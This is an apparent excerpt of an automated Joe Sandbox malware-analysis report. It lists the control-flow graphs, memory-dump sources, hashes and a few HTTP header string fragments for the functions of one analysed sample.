                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 2ef1345-2ef1352 59 2ef13eb-2ef13ec 58->59 60 2ef1358-2ef135e 58->60 60->59 61 2ef1364-2ef137a 60->61 61->59 63 2ef137c-2ef138f 61->63 65 2ef1391-2ef1398 63->65 66 2ef139b-2ef13ab call 2ef0e7c 65->66 69 2ef13ad-2ef13e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: c75914c5c2fd9a2c44e98bdb05f571555b8022ac69bf8e5de8e3bd9a3117d5da
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3821903194521AAFDF119F78C844B5DBBB6AF04704F058215FE59BF594D770E810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02EF14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 2ef14de-2ef1590 call 2ef3653 call 2ef0c9c call 2ef1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 9e32195c35fe4c013d06d0638b18f7a21d6aa4cb0cad3ff2d4457ad4206b72bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: A511BF72404518DEEF43AF60C5C8CAA73ECEE40704B46496AAE89EF44DFE709154CEE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02EF3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 88 2ef3f0d-2ef3f29 call 2ef3653 call 2ef379f 93 2ef3f3b-2ef3f66 call 2ef3f78 * 3 88->93 94 2ef3f2b-2ef3f39 call 2ef401b 88->94 107 2ef3f71 93->107 101 2ef3f76-2ef3f77 94->101 107->101 108 2ef3f71 call 2ef3f78 107->108 108->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: ccb448bd2594e9e12a0343683f9118e1193352485196ecc0ca4d878d133993e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF08C725E82C0AAEFC03BB18C496893BB9AF40305F45A1D0BB89AD0D0DE3085508E71
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02EF4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 134 2ef4675-2ef468d call 2ef3a1c 137 2ef468f-2ef4698 call 2ef3a6e 134->137 138 2ef469d-2ef46cd 134->138 137->138 141 2ef47e7-2ef47ec 138->141 142 2ef46d3-2ef46f5 138->142 142->141 144 2ef46fb-2ef4720 142->144 146 2ef4738-2ef475a 144->146 147 2ef4722-2ef4737 144->147 149 2ef47bf-2ef47c9 146->149 150 2ef475c-2ef477e 146->150 147->146 151 2ef47cb-2ef47dd call 2ef3673 149->151 152 2ef47e0-2ef47e5 149->152 150->149 156 2ef4780-2ef47a2 150->156 151->152 152->141 156->149 158 2ef47a4-2ef47bc 156->158 158->149
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: c6ae4e56d6bc73a9a13ce18e2e9494dee9705f05c8863bb2dd1f0e6e4e8b064b
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C4154B6500208BFEF125F65CC48BDEBFBAEF84708F154499EA44AA294D734D650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02EF4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 109 2ef4674-2ef4680 110 2ef468b-2ef468d 109->110 111 2ef4686 call 2ef3a1c 109->111 112 2ef468f-2ef4698 call 2ef3a6e 110->112 113 2ef469d-2ef46cd 110->113 111->110 112->113 116 2ef47e7-2ef47ec 113->116 117 2ef46d3-2ef46f5 113->117 117->116 119 2ef46fb-2ef4720 117->119 121 2ef4738-2ef475a 119->121 122 2ef4722-2ef4737 119->122 124 2ef47bf-2ef47c9 121->124 125 2ef475c-2ef477e 121->125 122->121 126 2ef47cb-2ef47dd call 2ef3673 124->126 127 2ef47e0-2ef47e5 124->127 125->124 131 2ef4780-2ef47a2 125->131 126->127 127->116 131->124 133 2ef47a4-2ef47bc 131->133 133->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 7853e65dd1f9f879bf6119bdddfb8ff56e039a5b374ebad6ae5f297f1ba5e279
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 044153B6500208BFEF129F65CC44BEEBBBAEF84708F154499EA44AA294D7349650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0147093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 147093e-147095f call 1470cc4 call 14714bc call 1473cc0 8 1470967-1470989 0->8 10 1470af1-1470af2 8->10 11 147098f-14709d2 call 14709d9 8->11 15 14709d4-14709d5 11->15 16 1470a3d-1470a80 11->16 17 14709d7-14709e8 call 1473653 15->17 18 1470a3c 15->18 21 1470a82-1470aae 16->21 22 1470aec call 1470af3 16->22 17->22 29 14709ee-1470a10 17->29 18->16 21->22 27 1470ab0-1470abc 21->27 22->10 32 1470ac1-1470ae5 27->32 29->22 33 1470a16-1470a3b 29->33 32->10 37 1470ae7-1470aea 32->37 33->18 33->22 37->22 37->32
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: d6f2f34b1b464a1e44f1c6b89cf103f10c01a9b556875d49a7bd2d19f9a17ebc
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 3951D2311442549FEF236F20CC85B9A7BB8AF15740F04019ABB49FE0E6DAB09580CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 014714BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 14714bc-1471590 call 14714de call 1470c9c call 1471345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction ID: 69ef56184c1bc0770d72b180158dcd93db12842f4792b49b6dd5159f935acab4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction Fuzzy Hash: 67210C72404614AEEB03AF60C9C8CE673ECEF50A04F45096B9D89EF059FA709154CAE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01471345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 57 1471345-1471352 58 14713eb-14713ec 57->58 59 1471358-147135e 57->59 59->58 60 1471364-147137a 59->60 60->58 62 147137c-147138f 60->62 64 1471391-1471398 62->64 65 147139b-14713ab call 1470e7c 64->65 68 14713ad-14713e2 65->68 68->58
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: cb371d9ce826a55a6c9dc78b981afe981a539cb5d67316e8a7ad5d71314db531
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: A0219031904216AFEB119F78C884B9DBFB5AF04710F054216FE55BB6A4D770E910CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 014714DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 69 14714de-1471590 call 1473653 call 1470c9c call 1471345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction ID: 4dc23d8cc93f885c4a63bc538729b5314ec0fea8d34c3560c1bd25de51de8a18
                                                                                                                                                                          • Opcode Fuzzy Hash: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction Fuzzy Hash: B611B6724046159EEF03AF60C5C8CEA73FCEE50A08B4509AF9D89EF459FE709154CAE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01473F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 87 1473f0d-1473f29 call 1473653 call 147379f 92 1473f3b-1473f66 call 1473f78 * 3 87->92 93 1473f2b-1473f39 call 147401b 87->93 106 1473f71 92->106 100 1473f76-1473f77 93->100 106->100 107 1473f71 call 1473f78 106->107 107->100
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: f31997f0e94645d9b99f307dbb99dfe4cfa29a02c52338434cdaf0b7dee68787
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: 11F08C70588281AAFF003FB28C5969D36B8BF30385F04009AAAC9BD0F0CE308550AE70
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 01474675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 133 1474675-147468d call 1473a1c 136 147468f-1474698 call 1473a6e 133->136 137 147469d-14746cd 133->137 136->137 140 14747e7-14747ec 137->140 141 14746d3-14746f5 137->141 141->140 143 14746fb-1474720 141->143 145 1474722-1474737 143->145 146 1474738-147475a 143->146 145->146 148 14747bf-14747c9 146->148 149 147475c-147477e 146->149 150 14747e0-14747e5 148->150 151 14747cb-14747dd call 1473673 148->151 149->148 155 1474780-14747a2 149->155 150->140 151->150 155->148 157 14747a4-14747bc 155->157 157->148
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 78e2b56832c136316e48e1db505ce654810fe2c5962caf7b4c9eed36f108598d
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: FB4174B6500208BFEF125F69CC48BEEBFB9FF84704F154069EA44AA254D734D650CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01474674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 108 1474674-1474680 109 147468b-147468d 108->109 110 1474686 call 1473a1c 108->110 111 147468f-1474698 call 1473a6e 109->111 112 147469d-14746cd 109->112 110->109 111->112 115 14747e7-14747ec 112->115 116 14746d3-14746f5 112->116 116->115 118 14746fb-1474720 116->118 120 1474722-1474737 118->120 121 1474738-147475a 118->121 120->121 123 14747bf-14747c9 121->123 124 147475c-147477e 121->124 125 14747e0-14747e5 123->125 126 14747cb-14747dd call 1473673 123->126 124->123 130 1474780-14747a2 124->130 125->115 126->125 130->123 132 14747a4-14747bc 130->132 132->123
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 713e19e7b0b50d882a19a44256ba5d35de350392c79ccfefcb1bdb785a34b1f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: FF4163B6500208BFEF129FA5CC48BEEBFBAFF84704F154069EA44AA254D734D640DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0116093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 116093e-116095f call 1160cc4 call 11614bc call 1163cc0 8 1160967-1160989 0->8 10 1160af1-1160af2 8->10 11 116098f-11609d2 call 11609d9 8->11 15 11609d4-11609d5 11->15 16 1160a3d-1160a80 11->16 17 11609d7-11609e8 call 1163653 15->17 18 1160a3c 15->18 21 1160a82-1160aae 16->21 22 1160aec call 1160af3 16->22 17->22 29 11609ee-1160a10 17->29 18->16 21->22 27 1160ab0-1160abc 21->27 22->10 31 1160ac1-1160ae5 27->31 29->22 33 1160a16-1160a3b 29->33 31->10 37 1160ae7-1160aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 3ef8b4b99b75002c0da831c93f7b81e2c645f254dd715e3bf63bccdcc3fbbdba
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B5192315442549FEB175F24CC85B997BBCEF04744F0401D9BB49FE0D6DBB096A0CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 011614BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 11614bc-11614df call 11614de 41 1161502-1161590 call 1161345 * 6 38->41 42 11614e1-1161500 call 1160c9c 38->42 42->41
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d63aec374ba4a82edc09d58ede7f76cfd3e196a7aafa6aaffec7fd3e48ce6db5
                                                                                                                                                                          • Instruction ID: ca9446ac266cb62fba29155b7167ac075d23726b83bdebe6c04dea929bb36878
                                                                                                                                                                          • Opcode Fuzzy Hash: d63aec374ba4a82edc09d58ede7f76cfd3e196a7aafa6aaffec7fd3e48ce6db5
                                                                                                                                                                          • Instruction Fuzzy Hash: 51211072405614AEDB03AF60C9C8CA773ECEF80608F45096A9D85EF049FF719164CBE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01161345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 1161345-1161352 59 11613eb-11613ec 58->59 60 1161358-116135e 58->60 60->59 61 1161364-116137a 60->61 61->59 63 116137c-116138f 61->63 65 1161391-1161398 63->65 66 116139b-11613ab call 1160e7c 65->66 69 11613ad-11613e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: f1dfe0a571fb963acbe03fcb2643c68d557788c35989c1da7696e4f36fc46b07
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: B2219031A04216AFEB119F78C844B5DBFB9AF44710F058215FE55BF594D770E810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 011614DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 11614de-1161590 call 1163653 call 1160c9c call 1161345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7949667107aebde7353fdb582656519b60ef247000cbbaa81536c7b33184ae9b
                                                                                                                                                                          • Instruction ID: 398ac33ed0ded64353b9649ef43a413b9e45298f246b10031eca1a3504f597d3
                                                                                                                                                                          • Opcode Fuzzy Hash: 7949667107aebde7353fdb582656519b60ef247000cbbaa81536c7b33184ae9b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3811C172404615AEEF07AF60C5C8CAA73ECEF80608B45096A9D86EF44DFF719164CBE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01163F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 9b24d890cd414d69b3160115f6f0181cdad2c7c5668fe810d00f953b9b53af3e
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: CFF082305A8241A6FF053BB09C4966936BCBF20309F0404D0AADDED0D0CF3145708E73
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 01164674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
